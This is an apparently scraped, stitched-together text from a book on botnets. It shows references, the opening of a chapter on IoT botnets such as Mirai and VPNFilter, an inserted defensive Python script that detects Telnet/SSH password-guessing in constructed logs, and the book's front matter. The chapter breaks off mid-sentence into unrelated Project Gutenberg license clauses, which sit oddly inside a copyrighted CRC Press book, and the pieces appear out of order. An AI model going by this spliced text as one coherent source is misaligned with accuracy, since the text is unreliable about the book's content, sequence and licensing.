Jing Tao. Cloud-based push-styled mobile botnets: A case study of exploiting the
cloud to device messaging service. In Proceedings of the 28th Annual Computer
Security Applications Conference, ACSAC ’12, pages 119–128, New York, NY,
USA, 2012. ACM.
[54] Jakub Kroustek, Vladislav Iliushin, Anna Shirokova, Jan Neduchal, and
Martin Hron. Torii botnet - not another mirai variant. url: https://blog.avast.com/
new-torii-botnet-threat-research, Access Date: January 2019.
[55] C. Kolias, G. Kambourakis, A. Stavrou, and J. Voas. Ddos in the iot: Mirai and
other botnets. Computer, 50(7):80–84, 2017.
[56] B. Krebs. Krebsonsecurity hit with record ddos. url: https://krebsonsecurity.com/
2016/09/krebsonsecurity-hit-with-record-ddos/, Access Date: January 2019.
[57] Manos Antonakakis, Tim April, Michael Bailey, Matthew Bernhard, Elie Bursztein,
Jaime Cochran, Zakir Durumeric, J. Alex Halderman, Luca Invernizzi, Michalis
Kallitsis, Deepak Kumar, Chaz Lever, Zane Ma, Joshua Mason, Damian Menscher,
Chad Seaman, Nick Sullivan, Kurt Thomas, and Yi Zhou. Understanding the mirai
botnet. In Proceedings of the 26th USENIX Conference on Security Symposium, SEC’17,
pages 1093–1110, Berkeley, CA, USA, 2017. USENIX Association.
[58] Gokhan Sagirlar, Barbara Carminati, and Elena Ferrari. Autobotcatcher:
Blockchain-based p2p botnet detection for the internet of things. 2018 IEEE 4th
International Conference on Collaboration and Internet Computing (CIC), pages 1–8,
2018.
[59] G. Kambourakis, C. Kolias, and A. Stavrou. The mirai botnet and the iot zombie
armies. In MILCOM 2017-2017 IEEE Military Communications Conference
(MILCOM), pages 267–272, Oct 2017.
[60] S. Torabi, E. Bou-Harb, C. Assi, M. Galluscio, A. Boukhtouta, and M. Debbabi.
Inferring, characterizing, and investigating internet-scale malicious iot device
activities: A network telescope perspective. In 2018 48th Annual IEEE/IFIP International
Conference on Dependable Systems and Networks (DSN), pages 562–573, Jun 2018.
[61] S. M. Sajjad and M. Yousaf. Ucam: Usage, communication and access monitoring
based detection system for iot botnets. In 2018 17th IEEE International Conference
On Trust, Security and Privacy In Computing And Communications/12th IEEE
International Conference On Big Data Science and Engineering (TrustCom/BigDataSE),
pages 1547–1550, Aug 2018.
[62] Yair Meidan, Michael Bohadana, Yael Mathov, Yisroel Mirsky, Asaf Shabtai,
Dominik Breitenbacher, and Yuval Elovici. N-BaIoT: Network-based detection of
iot botnet attacks using deep autoencoders. IEEE Pervasive Computing, 17:12–22,
2018.
[63] O. Shwartz, Y. Mathov, M. Bohadana, Y. Oren, and Y. Elovici. Reverse engineering
iot devices: Effective techniques and methods. IEEE Internet of Things Journal,
5(6):4965–4976, 2018.
[64] Yazan Boshmaf, Ildar Muslukhov, Konstantin Beznosov, and Matei Ripeanu. The
socialbot network: When bots socialize for fame and money. In Proceedings of the
27th Annual Computer Security Applications Conference, ACSAC ’11, pages 93–102,
New York, NY, USA, 2011. ACM.
[65] C. Freitas, F. Benevenuto, S. Ghosh, and A. Veloso. Reverse engineering socialbot
infiltration strategies in twitter. In 2015 IEEE/ACM International Conference on
Advances in Social Networks Analysis and Mining (ASONAM), pages 25–32, Aug
2015.
[66] Leyla Bilge, Thorsten Strufe, Davide Balzarotti, and Engin Kirda. All your contacts
are belong to us: Automated identity theft attacks on social networks. In Proceedings
of the 18th International Conference on World Wide Web, WWW ’09, pages 551–560,
New York, NY, USA, 2009. ACM.
[67] Marti Motoyama, Kirill Levchenko, Chris Kanich, Damon McCoy,
Geoffrey M. Voelker, and Stefan Savage. Re: CAPTCHAs: Understanding CAPTCHA-solving
services in an economic context. In USENIX Security Symposium, 2010.
[68] Zack Coburn and Greg Marra. Realboy: Believable twitter bots. http://ca.olin.edu/
2008/realboy/index.html, Access Date: January 2019.
[69] A. Paradise, A. Shabtai, R. Puzis, A. Elyashar, Y. Elovici, M. Roshandel, and C. Peylo.
Creation and management of social network honeypots for detecting targeted cyber
attacks. IEEE Transactions on Computational Social Systems, 4(3):65–79, Sep 2017.
[70] C. Pacheco, A. Garcia, R. Machado, and R. Salles. Building reference datasets to
support socialbots detection. In 2018 Workshop on Metrology for Industry 4.0 and
IoT, pages 198–202, Apr 2018.
[71] Chiyu Cai, Linjing Li, and Daniel Zeng. Detecting social bots by jointly modeling
deep behavior and content information. In Proceedings of the 2017 ACM on
Conference on Information and Knowledge Management, CIKM ’17, pages 1995–1998,
New York, NY, USA, 2017. ACM.
[72] Zhi Yang, Christo Wilson, Xiao Wang, Tingting Gao, Ben Y. Zhao, and Yafei Dai.
Uncovering social network sybils in the wild. ACM Trans. Knowl. Discov. Data,
8(1):2:1–2:29, Feb 2014.
[73] Xianchao Zhang, Haijun Bai, and Wenxin Liang. A social spam detection framework
via semi-supervised learning. In Revised Selected Papers of the PAKDD 2016
Workshops on Trends and Applications in Knowledge Discovery and Data
Mining - Volume 9794, pages 214–226, Berlin, Heidelberg, 2016. Springer-Verlag.
Chapter 2
IoT Botnets
The Journey So Far and the Road Ahead
Pascal Geenens
Radware, Inc.
Contents
2.1 Introduction  34
2.2 IoT Attack Surface  38
  2.2.1 Universal Plug and Play  40
2.3 Blueprint of an IoT Botnet  44
  2.3.1 Kaiten  46
    2.3.1.1 Setup, Scanning and Infection  47
    2.3.1.2 Client Bot  48
  2.3.2 Qbot  52
    2.3.2.1 Setup  52
    2.3.2.2 Scanning and Infection  54
    2.3.2.3 Client Bot  55
    2.3.2.4 Command and Control  59
    2.3.2.5 Qbot Variants  60
  2.3.3 Mirai  62
    2.3.3.1 Client Bot  63
    2.3.3.2 Scanning and Infection  65
    2.3.3.3 Loader Service  70
    2.3.3.4 Command and Control  75
    2.3.3.5 Attack Payload  77
    2.3.3.6 DNS Water Torture  78
  2.3.4 Hajime  79
    2.3.4.1 Infection  82
    2.3.4.2 Client Bot  84
    2.3.4.3 Scanner Extension Module  86
  2.3.5 BrickerBot  88
    2.3.5.1 BrickerBot Sentinels  90
  2.3.6 VPNFilter  92
    2.3.6.1 Extension Plug-Ins  93
2.4 DDoS-for-Hire, the Case of Booters and Stressers  95
2.5 Closing Thought  97
2.1 Introduction
The rise in popularity of IoT botnets centers around the Mirai attacks of October 2016. In a period of only a few weeks, KrebsOnSecurity.com¹, OVH², and Dyn³ all became victims of record-breaking distributed denial-of-service (DDoS) attacks. The attacks that temporarily crippled KrebsOnSecurity.com exceeded 600 Gbps in volume [1], one of the largest on record at the time. The impact of the Dyn attacks was felt by large swathes of users in Europe and North America and affected major internet platforms and services including Airbnb, GitHub, Amazon, CNN, Twitter, Slack, PlayStation Network, Xbox Live, and many more. Between the OVH and Dyn attacks, Mirai had its source code published on HackForums and quickly replicated to more accessible platforms such as GitHub. Tutorial blogs and YouTube videos detailing how to build and deploy Mirai followed shortly. From that point forward, the attacker community had access to a tool of mass destruction that was easy to build and deploy, with an opportunity to improve and extend its capabilities.
Since the Mirai attacks in 2016, IoT botnets have come a long way. The original goal of Mirai was to create an efficient tool for performing DDoS attacks. Later, IoT bots added new exploits, mainly to keep ahead of their competing cousins, while mostly reusing the same scanning, command and control (C2), and malicious payloads in terms of attack vectors.
By the end of 2017, IoT malware started taking advantage of the same exploit vectors but carrying new malicious capabilities, such as cryptocurrency mining, anonymizing proxy services, data exfiltration capabilities, rootkits, and self-destructive sequences. The anonymizing proxies were leveraged for concealing targeted attacks and spam or click-fraud campaigns. The sophistication of IoT malware increased considerably as organized hacking groups joined the opportunistic attacker community in their war on free distributed computing resources. The VPNFilter malware, discovered by Cisco Talos in 2018 [2], was attributed to a Russian state-sponsored cyber-crime group [3]. VPNFilter represents an inflection point in terms of sophistication, persistence, and evasive actions observed in IoT malware. Up to that point, IoT malware was unsophisticated, providing limited forms of evasion, little or no concealment of C2 activity, and no or limited protection of C2 infrastructure.
¹ Website of investigative reporter Brian Krebs.
² French web hosting provider.
³ Domain Name System (DNS) provider.
While the most notorious, Mirai was not the first malware to take advantage of IoT devices. As early as December 2013, a researcher [4] observed hundreds of thousands of spam emails originating from a botnet made up of one hundred thousand hacked appliances. While the majority of malicious mail was initiated by home networking devices, such as routers and network attached storage (NAS) systems, a significant percentage of malicious email came from nontraditional sources such as connected multimedia centers, smart televisions, and at least one refrigerator. The words “thingbot” and “thingbot-net” were coined by Proofpoint to refer to these newly discovered IoT-based botnets. In March 2014, DDoS attacks were observed [5] originating from a botnet consisting of over 900 CCTV cameras. All compromised devices used in the attack were running embedded Linux with BusyBox. The malware was an ELF binary compiled for the ARM architecture and a variant of the BASHLITE (aka Gafgyt) malware, known for scanning network devices running BusyBox and looking for open Telnet/SSH services, which are susceptible to brute-force dictionary attacks. In this specific case, the variant also came with an ability to launch HTTP GET flood denial-of-service (DoS) attacks from the compromised devices. BASHLITE was not the first Linux malware to spread through Telnet services using username/password combinations, however. The technique was already used back in 2012 by Lightaidra, a worm supporting a number of different architectures such as MIPS, ARM, and PPC and known to perform DDoS attacks. Between 2015 and 2016, different Linux malware families were discovered, all primarily used for performing DDoS attacks: Elknot/BillGates (2015), XOR.DDoS (2015), LUABOT (2016), Remaiten (2016), NewAidra/IRCTelnet (2016), and Mirai (2016). All were improved variants or recombined code of previous malware in terms of scanning and exploiting, C2 protocols, and supported architectures. In September 2015, the FBI and the Department of Homeland Security published an alert on the opportunities provided by IoT for cybercrime [6]. Despite the warning, in June 2016, a botnet consisting of 25,000 CCTV cameras assaulted an online jewelry store [7], and just a few months later the infamous Mirai demonstrated the deplorable state of IoT security by enslaving multiple hundreds of thousands of devices and performing extinction-level DDoS attacks on the DNS provider Dyn.
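The Telnet/SSH dictionary attacks that BASHLITE, Lightaidra and later Mirai used to spread leave a very recognizable trace on the victim side: a burst of failed logins from one source address, cycling through a short list of factory-default usernames, often followed within seconds by a successful login. The following Python script is an added example (not code from the chapter, nor from any of the malware families it describes) that implements that detection over constructed syslog-style lines. The log format, the `cam01` host, the addresses and the year are all assumptions made for the sample; real devices log differently, so `LINE_RE` is the part to adapt.

```python
"""Flag Telnet/SSH dictionary attacks of the kind IoT worms use to spread.

Added example, not code from the chapter or from any botnet it describes.
Input: syslog-style lines (constructed here, in a format loosely modelled
on BusyBox telnetd and OpenSSH messages; real devices differ, so adjust
LINE_RE to your logs). Output: one alert per source address that produced
THRESHOLD or more failed logins inside WINDOW, noting whether a successful
login from the same address followed the burst (a likely compromise).
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample data: a camera's syslog during a scanner's password run.
SAMPLE_LOG = """\
Oct 21 03:14:01 cam01 telnetd[412]: login failed for user 'root' from 203.0.113.7
Oct 21 03:14:02 cam01 telnetd[412]: login failed for user 'admin' from 203.0.113.7
Oct 21 03:14:02 cam01 telnetd[412]: login failed for user 'root' from 203.0.113.7
Oct 21 03:14:03 cam01 telnetd[412]: login failed for user 'support' from 203.0.113.7
Oct 21 03:14:04 cam01 telnetd[412]: login failed for user 'user' from 203.0.113.7
Oct 21 03:14:05 cam01 telnetd[412]: login succeeded for user 'admin' from 203.0.113.7
Oct 21 03:20:10 cam01 sshd[501]: Failed password for admin from 198.51.100.9 port 40122 ssh2
Oct 21 03:25:10 cam01 sshd[501]: Failed password for admin from 198.51.100.9 port 40123 ssh2
Oct 21 03:26:00 cam01 sshd[501]: Accepted password for admin from 192.0.2.5 port 55120 ssh2
"""

WINDOW = timedelta(seconds=60)  # sliding window for counting failures
THRESHOLD = 4                   # failures per source inside WINDOW => alert

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ "
    r"(?P<svc>telnetd|sshd)\[\d+\]: "
    r"(?:login (?P<tres>failed|succeeded) for user '(?P<tuser>[^']+)' from (?P<tip>[\d.]+)"
    r"|(?P<sres>Failed|Accepted) password for (?P<suser>\S+) from (?P<sip>[\d.]+))"
)


def parse_line(line, year=2016):
    """Return an auth event dict for a Telnet/SSH login line, else None.

    Syslog lines carry no year, so the caller supplies one (2016 here, to
    match the constructed sample)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    if m["svc"] == "telnetd":
        return {"ts": ts, "svc": "telnet", "user": m["tuser"],
                "ip": m["tip"], "ok": m["tres"] == "succeeded"}
    return {"ts": ts, "svc": "ssh", "user": m["suser"],
            "ip": m["sip"], "ok": m["sres"] == "Accepted"}


def detect_dictionary_attacks(lines, window=WINDOW, threshold=THRESHOLD):
    """Sliding-window brute-force detector keyed on the source address."""
    events = [e for e in (parse_line(ln) for ln in lines) if e]
    events.sort(key=lambda e: e["ts"])
    recent = defaultdict(list)   # ip -> timestamps of failures inside window
    users = defaultdict(set)     # ip -> usernames tried
    fails = defaultdict(int)     # ip -> total failures seen
    alerts = {}
    for e in events:
        ip = e["ip"]
        if e["ok"]:
            # A success after a burst from the same source is the signal that
            # matters most: a default credential very likely worked.
            if ip in alerts:
                alerts[ip]["success_after_burst"] = True
                alerts[ip]["compromised_user"] = e["user"]
            continue
        q = recent[ip]
        q.append(e["ts"])
        while q and e["ts"] - q[0] > window:   # expire old failures
            q.pop(0)
        users[ip].add(e["user"])
        fails[ip] += 1
        if len(q) >= threshold:
            a = alerts.setdefault(ip, {"ip": ip, "first_seen": q[0],
                                       "success_after_burst": False,
                                       "compromised_user": None})
            a["failures"] = fails[ip]
            a["distinct_users"] = len(users[ip])
    return list(alerts.values())


if __name__ == "__main__":
    for a in detect_dictionary_attacks(SAMPLE_LOG.splitlines()):
        print(f"{a['ip']}: {a['failures']} failures, {a['distinct_users']} "
              f"usernames, success after burst: {a['success_after_burst']}")
```

On the sample, the Telnet burst from 203.0.113.7 is flagged (five failures across four usernames in four seconds, then a successful `admin` login), while the two SSH failures from 198.51.100.9 five minutes apart fall outside the window and stay quiet. The success-after-burst flag is what should drive the response priority: a device that accepted a default credential after a scanner's password run should be treated as compromised, not merely probed.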
From that moment forward, increasingly creative and sophisticated IoT botnets were observed. Below is a non-exhaustive list of the IoT botnets that represent a milestone in the growth in sophistication of IoT botnets:
■ The Hide N’ Seek (HNS) botnet was one of the first to take a stab at persistence across reboots, a nontrivial feature to implement given the diversity of devices. HNS also implemented a custom peer-to-peer protocol for its C2 communications.
■ Satori, the botnet that kept coming back in different forms and kept creating waves of IoT infections while changing infection vectors, abusing the most obvious IoT exploits while adding new ones such as the Android Debug Bridge exploit. Satori carried mostly crypto-mining payloads and no DDoS attacks and was an experiment by its author for testing and tuning exploit vectors. The author, a confused teenager, was mainly motivated by e-fame among his peers; known to have money issues, he found the mining earnings a welcome bonus of his experiments.
■ OMG [8], a botnet that added a tiny-footprint, open-source proxy server to the bots to create an anonymizer network based on other people’s appliances.
■ VPNFilter [2], a botnet primarily targeting routers and modems geolocated in Ukraine, was found carrying malicious payloads to proxy its victims’ internet traffic and scan for Modbus traffic on the local network. Allegedly a nation-state botnet with a complex multistage infection scheme, numerous evasions, and provisions to protect against takedown of its C2 infrastructure.
A few days before the Dyn attacks by Mirai, researchers from Rapidity Networks discovered a much more sophisticated and competing IoT botnet. They named it “Hajime” [9], “beginning” in Japanese, a playful iteration on the Mirai name, which means “future” in Japanese. Hajime uses a distributed peer-to-peer protocol implemented on top of BitTorrent using daily rotating info hashes and RC4 public/private key encryption. Hajime can update itself and extend its capabilities through extension modules. Hajime is supposedly a white hat project: a botnet built to protect vulnerable IoT devices from further abuse by malicious botnets. It marked a new era in which white hat botnets could bring a solution by inoculating the internet against the viral spreading of malicious botnets through vulnerable IoT devices. In the same spirit, there was BrickerBot [10], a vigilante botnet designed to purge the internet of vulnerable IoT devices. Using sentinels that watch for infected devices that attempt to compromise one of its bots, BrickerBot would retaliate against the attacker with devastating permanent denial-of-service (PDoS) attacks. BrickerBot was the first fully autonomous IoT botnet, not requiring any user interaction to perform attacks and fully decentralized in the sense that each bot was functioning entirely independently of the others.
A permanent denial-of-service (PDoS) attack damages its victim to such an extent that replacement of hardware or reinitialization of software or firmware is needed to recover the service. The effects of a PDoS attack are lasting, compared to a DDoS attack, which renders a service unavailable only temporarily, for the duration of the attack (see Figure 2.1).
October 2016 brought the inflection point for IoT botnets, as Mirai provided this unsophisticated weapon of destruction, free for anyone to use, abuse, and improve. The botnet sizes observed in the first few months after Mirai were daunting, but as competition for vulnerable IoT resources grew, botnets became more fragmented, reducing botnet sizes but at the same time increasing the number of botnets and potential threats. Owned devices got re-owned by newer, more sophisticated variants, which reduced the overall life expectancy of IoT botnets. However, this never reduced the risk associated with IoT botnets as such: while a couple of thousand IoT devices are not enough to generate the internet-level extinction events of which we got a taste during the Dyn attacks, they are plenty to bring down most online businesses.
The remainder of this chapter aims to give the reader a solid understanding of the mechanics behind IoT botnets: the what and why of their features, their evolution, and, most importantly, their potential to thrive on the lackluster security of connected devices. The approach of this chapter is to illustrate through known, real-world botnets. Where available, fragments of the actual bot source code will be used to provide a deeper understanding and give a peek behind the curtains into the world of botnet authors. The chapter builds up from the earlier,
Figure 2.1 PDoS vs DDoS.
Gutenberg License included with this eBook or online at
www.gutenberg.org. If you are not located in the United
States, you will have to check the laws of the country
where you are located before using this eBook.
1.E.2. If an individual Project Gutenberg™ electronic work is
derived from texts not protected by U.S. copyright law (does not
contain a notice indicating that it is posted with permission of
the copyright holder), the work can be copied and distributed to
anyone in the United States without paying any fees or charges.
If you are redistributing or providing access to a work with the
phrase “Project Gutenberg” associated with or appearing on the
work, you must comply either with the requirements of
paragraphs 1.E.1 through 1.E.7 or obtain permission for the use
of the work and the Project Gutenberg™ trademark as set forth
in paragraphs 1.E.8 or 1.E.9.
1.E.3. If an individual Project Gutenberg™ electronic work is
posted with the permission of the copyright holder, your use and
distribution must comply with both paragraphs 1.E.1 through
1.E.7 and any additional terms imposed by the copyright holder.
Additional terms will be linked to the Project Gutenberg™
License for all works posted with the permission of the copyright
holder found at the beginning of this work.
1.E.4. Do not unlink or detach or remove the full Project
Gutenberg™ License terms from this work, or any files
containing a part of this work or any other work associated with
Project Gutenberg™.
1.E.5. Do not copy, display, perform, distribute or redistribute
this electronic work, or any part of this electronic work, without
prominently displaying the sentence set forth in paragraph 1.E.1
with active links or immediate access to the full terms of the
Project Gutenberg™ License.
1.E.6. You may convert to and distribute this work in any binary,
compressed, marked up, nonproprietary or proprietary form,
including any word processing or hypertext form. However, if
you provide access to or distribute copies of a Project
Gutenberg™ work in a format other than “Plain Vanilla ASCII” or
other format used in the official version posted on the official
Project Gutenberg™ website (www.gutenberg.org), you must,
at no additional cost, fee or expense to the user, provide a copy,
a means of exporting a copy, or a means of obtaining a copy
upon request, of the work in its original “Plain Vanilla ASCII” or
other form. Any alternate format must include the full Project
Gutenberg™ License as specified in paragraph 1.E.1.
1.E.7. Do not charge a fee for access to, viewing, displaying,
performing, copying or distributing any Project Gutenberg™
works unless you comply with paragraph 1.E.8 or 1.E.9.
1.E.8. You may charge a reasonable fee for copies of or
providing access to or distributing Project Gutenberg™
electronic works provided that:
• You pay a royalty fee of 20% of the gross profits you derive
from the use of Project Gutenberg™ works calculated using the
method you already use to calculate your applicable taxes. The
fee is owed to the owner of the Project Gutenberg™ trademark,
but he has agreed to donate royalties under this paragraph to
the Project Gutenberg Literary Archive Foundation. Royalty
payments must be paid within 60 days following each date on
which you prepare (or are legally required to prepare) your
periodic tax returns. Royalty payments should be clearly marked
as such and sent to the Project Gutenberg Literary Archive
Foundation at the address specified in Section 4, “Information
about donations to the Project Gutenberg Literary Archive
Foundation.”
• You provide a full refund of any money paid by a user who
notifies you in writing (or by e-mail) within 30 days of receipt
that s/he does not agree to the terms of the full Project
Gutenberg™ License. You must require such a user to return or
destroy all copies of the works possessed in a physical medium
and discontinue all use of and all access to other copies of
Project Gutenberg™ works.
• You provide, in accordance with paragraph 1.F.3, a full refund of
any money paid for a work or a replacement copy, if a defect in
the electronic work is discovered and reported to you within 90
days of receipt of the work.
• You comply with all other terms of this agreement for free
distribution of Project Gutenberg™ works.
1.E.9. If you wish to charge a fee or distribute a Project
Gutenberg™ electronic work or group of works on different
terms than are set forth in this agreement, you must obtain
permission in writing from the Project Gutenberg Literary
Archive Foundation, the manager of the Project Gutenberg™
trademark. Contact the Foundation as set forth in Section 3
below.
1.F.
1.F.1. Project Gutenberg volunteers and employees expend
considerable effort to identify, do copyright research on,
transcribe and proofread works not protected by U.S. copyright
law in creating the Project Gutenberg™ collection. Despite these
efforts, Project Gutenberg™ electronic works, and the medium
on which they may be stored, may contain “Defects,” such as,
but not limited to, incomplete, inaccurate or corrupt data,
transcription errors, a copyright or other intellectual property
infringement, a defective or damaged disk or other medium, a
computer virus, or computer codes that damage or cannot be
read by your equipment.
1.F.2. LIMITED WARRANTY, DISCLAIMER OF DAMAGES - Except
for the “Right of Replacement or Refund” described in
paragraph 1.F.3, the Project Gutenberg Literary Archive
Foundation, the owner of the Project Gutenberg™ trademark,
and any other party distributing a Project Gutenberg™ electronic
work under this agreement, disclaim all liability to you for
damages, costs and expenses, including legal fees. YOU AGREE
THAT YOU HAVE NO REMEDIES FOR NEGLIGENCE, STRICT
LIABILITY, BREACH OF WARRANTY OR BREACH OF CONTRACT
EXCEPT THOSE PROVIDED IN PARAGRAPH 1.F.3. YOU AGREE
THAT THE FOUNDATION, THE TRADEMARK OWNER, AND ANY
DISTRIBUTOR UNDER THIS AGREEMENT WILL NOT BE LIABLE
TO YOU FOR ACTUAL, DIRECT, INDIRECT, CONSEQUENTIAL,
PUNITIVE OR INCIDENTAL DAMAGES EVEN IF YOU GIVE
NOTICE OF THE POSSIBILITY OF SUCH DAMAGE.
1.F.3. LIMITED RIGHT OF REPLACEMENT OR REFUND - If you
discover a defect in this electronic work within 90 days of
receiving it, you can receive a refund of the money (if any) you
paid for it by sending a written explanation to the person you
received the work from. If you received the work on a physical
medium, you must return the medium with your written
explanation. The person or entity that provided you with the
defective work may elect to provide a replacement copy in lieu
of a refund. If you received the work electronically, the person
or entity providing it to you may choose to give you a second
opportunity to receive the work electronically in lieu of a refund.
If the second copy is also defective, you may demand a refund
in writing without further opportunities to fix the problem.
1.F.4. Except for the limited right of replacement or refund set
forth in paragraph 1.F.3, this work is provided to you ‘AS-IS’,
WITH NO OTHER WARRANTIES OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR ANY PURPOSE.
1.F.5. Some states do not allow disclaimers of certain implied
warranties or the exclusion or limitation of certain types of
damages. If any disclaimer or limitation set forth in this
agreement violates the law of the state applicable to this
agreement, the agreement shall be interpreted to make the
maximum disclaimer or limitation permitted by the applicable
state law. The invalidity or unenforceability of any provision of
this agreement shall not void the remaining provisions.
1.F.6. INDEMNITY - You agree to indemnify and hold the
Foundation, the trademark owner, any agent or employee of the
Foundation, anyone providing copies of Project Gutenberg™
electronic works in accordance with this agreement, and any
volunteers associated with the production, promotion and
distribution of Project Gutenberg™ electronic works, harmless
from all liability, costs and expenses, including legal fees, that
arise directly or indirectly from any of the following which you
do or cause to occur: (a) distribution of this or any Project
Gutenberg™ work, (b) alteration, modification, or additions or
deletions to any Project Gutenberg™ work, and (c) any Defect
you cause.
Section 2. Information about the Mission
of Project Gutenberg™
Project Gutenberg™ is synonymous with the free distribution of
electronic works in formats readable by the widest variety of
computers including obsolete, old, middle-aged and new
computers. It exists because of the efforts of hundreds of
volunteers and donations from people in all walks of life.
Volunteers and financial support to provide volunteers with the
assistance they need are critical to reaching Project
Gutenberg™’s goals and ensuring that the Project Gutenberg™
collection will remain freely available for generations to come. In
2001, the Project Gutenberg Literary Archive Foundation was
created to provide a secure and permanent future for Project
Gutenberg™ and future generations. To learn more about the
Project Gutenberg Literary Archive Foundation and how your
efforts and donations can help, see Sections 3 and 4 and the
Foundation information page at www.gutenberg.org.
Section 3. Information about the Project
Gutenberg Literary Archive Foundation
The Project Gutenberg Literary Archive Foundation is a non-
profit 501(c)(3) educational corporation organized under the
laws of the state of Mississippi and granted tax exempt status
by the Internal Revenue Service. The Foundation’s EIN or
federal tax identification number is 64-6221541. Contributions
to the Project Gutenberg Literary Archive Foundation are tax
deductible to the full extent permitted by U.S. federal laws and
your state’s laws.
The Foundation’s business office is located at 809 North 1500
West, Salt Lake City, UT 84116, (801) 596-1887. Email contact
links and up to date contact information can be found at the
Foundation’s website and official page at
www.gutenberg.org/contact
Section 4. Information about Donations to
the Project Gutenberg Literary Archive
Foundation
Project Gutenberg™ depends upon and cannot survive without
widespread public support and donations to carry out its mission
of increasing the number of public domain and licensed works
that can be freely distributed in machine-readable form
accessible by the widest array of equipment including outdated
equipment. Many small donations ($1 to $5,000) are particularly
important to maintaining tax exempt status with the IRS.
The Foundation is committed to complying with the laws
regulating charities and charitable donations in all 50 states of
the United States. Compliance requirements are not uniform
and it takes a considerable effort, much paperwork and many
fees to meet and keep up with these requirements. We do not
solicit donations in locations where we have not received written
confirmation of compliance. To SEND DONATIONS or determine
the status of compliance for any particular state visit
www.gutenberg.org/donate.
While we cannot and do not solicit contributions from states
where we have not met the solicitation requirements, we know
of no prohibition against accepting unsolicited donations from
donors in such states who approach us with offers to donate.
International donations are gratefully accepted, but we cannot
make any statements concerning tax treatment of donations
received from outside the United States. U.S. laws alone swamp
our small staff.
Please check the Project Gutenberg web pages for current
donation methods and addresses. Donations are accepted in a
number of other ways including checks, online payments and
credit card donations. To donate, please visit:
www.gutenberg.org/donate.
Section 5. General Information About
Project Gutenberg™ electronic works
Professor Michael S. Hart was the originator of the Project
Gutenberg™ concept of a library of electronic works that could
be freely shared with anyone. For forty years, he produced and
distributed Project Gutenberg™ eBooks with only a loose
network of volunteer support.
Project Gutenberg™ eBooks are often created from several
printed editions, all of which are confirmed as not protected by
copyright in the U.S. unless a copyright notice is included. Thus,
we do not necessarily keep eBooks in compliance with any
particular paper edition.
Most people start at our website which has the main PG search
facility: www.gutenberg.org.
This website includes information about Project Gutenberg™,
including how to make donations to the Project Gutenberg
Literary Archive Foundation, how to help produce our new
eBooks, and how to subscribe to our email newsletter to hear
about new eBooks.
Botnets Architectures Countermeasures And Challenges First Edition Anagnostopoulos

Botnets: Architectures, Countermeasures, and Challenges

Edited by
Georgios Kambourakis
Marios Anagnostopoulos
Weizhi Meng
Peng Zhou
CRC Press
Taylor & Francis Group
6000 Broken Sound Parkway NW, Suite 300
Boca Raton, FL 33487-2742

© 2020 by Taylor & Francis Group, LLC
CRC Press is an imprint of Taylor & Francis Group, an Informa business

No claim to original U.S. Government works

Printed on acid-free paper

International Standard Book Number-13: 978-0-367-19154-2 (Hardback)

This book contains information obtained from authentic and highly regarded sources. Reasonable efforts have been made to publish reliable data and information, but the author and publisher cannot assume responsibility for the validity of all materials or the consequences of their use. The authors and publishers have attempted to trace the copyright holders of all material reproduced in this publication and apologize to copyright holders if permission to publish in this form has not been obtained. If any copyright material has not been acknowledged please write and let us know so we may rectify in any future reprint.

Except as permitted under U.S. Copyright Law, no part of this book may be reprinted, reproduced, transmitted, or utilized in any form by any electronic, mechanical, or other means, now known or hereafter invented, including photocopying, microfilming, and recording, or in any information storage or retrieval system, without written permission from the publishers.

For permission to photocopy or use material electronically from this work, please access www.copyright.com (www.copyright.com/) or contact the Copyright Clearance Center, Inc. (CCC), 222 Rosewood Drive, Danvers, MA 01923, 978-750-8400. CCC is a not-for-profit organization that provides licenses and registration for a variety of users. For organizations that have been granted a photocopy license by the CCC, a separate system of payment has been arranged.

Trademark Notice: Product or corporate names may be trademarks or registered trademarks, and are used only for identification and explanation without intent to infringe.

Visit the Taylor & Francis Web site at www.taylorandfrancis.com and the CRC Press Web site at www.crcpress.com
Contents

Preface ... vii
About the Editors ... ix
Contributors ... xi

1  Botnet Architectures: A State-of-the-Art Review ... 1
   BASHEER AL-DUWAIR AND MOATH JARRAH

2  IoT Botnets: The Journey So Far and the Road Ahead ... 33
   PASCAL GEENENS

3  IoT Botnet Traits and Techniques: A View of the State of the Art ... 101
   PASCAL GEENENS

4  Advanced Information Hiding Techniques for Modern Botnets ... 165
   LUCA CAVIGLIONE, WOJCIECH MAZURCZYK, AND STEFFEN WENDZEL

5  Steganography Techniques for Command and Control (C2) Channels ... 189
   JEDRZEJ BIENIASZ AND KRZYSZTOF SZCZYPIORSKI

6  Blockchain-Based Botnets for Command-and-Control Resilience ... 217
   WEIZHI WANG AND XIAOBO MA

7  Detecting Botnets and Unknown Network Attacks in Big Traffic Data ... 237
   LUIS SACRAMENTO, IBÉRIA MEDEIROS, JOÃO BOTA, AND MIGUEL CORREIA

8  Domain Generation Algorithm Detection Techniques through Network Analysis and Machine Learning ... 269
   FEDERICA BISIO, SALVATORE SAELI, AND DANILO MASSA

9  Identifying IoT-Based Botnets: A Microservice Architecture for IoT Management and Security ... 293
   THARUN KAMMARA AND MELODY MOH

10 Understanding and Detecting Social Botnet ... 327
   YUEDE JI AND QIANG LI

11 Use of Botnets for Mining Cryptocurrencies ... 359
   RENITA MURIMI

12 Time to Diverge the Botnet Revenues from Criminal Wallet? ... 387
   GIOVANNI BOTTAZZI, GIANLUIGI ME, PIERLUIGI PERRONE, AND GIUSEPPE GIULIO RUTIGLIANO

Index ... 403
Preface

Botnets pose a growing threat to the Internet, with their ever-increasing distributed denial of service (DDoS) attacks of various kinds. In the Internet of Everything (IoE) era, a botnet army can be assembled using a variety of enslaved machines, including desktop computers, smartphones, wearables, and embedded devices. These multitudinous armies are controlled remotely by a malicious third party, known as the botmaster or botherder. Recent botnet examples, such as the case of the Mirai botnet, prove that it is quite straightforward to discover and remotely control thousands or millions of unmonitored and poorly protected devices. The mushrooming of cheap Internet of Things (IoT) devices, deployed with default settings and poor protection and far greater in number, gives rise to even greater concerns. This paves the way for assembling powerful botnets.

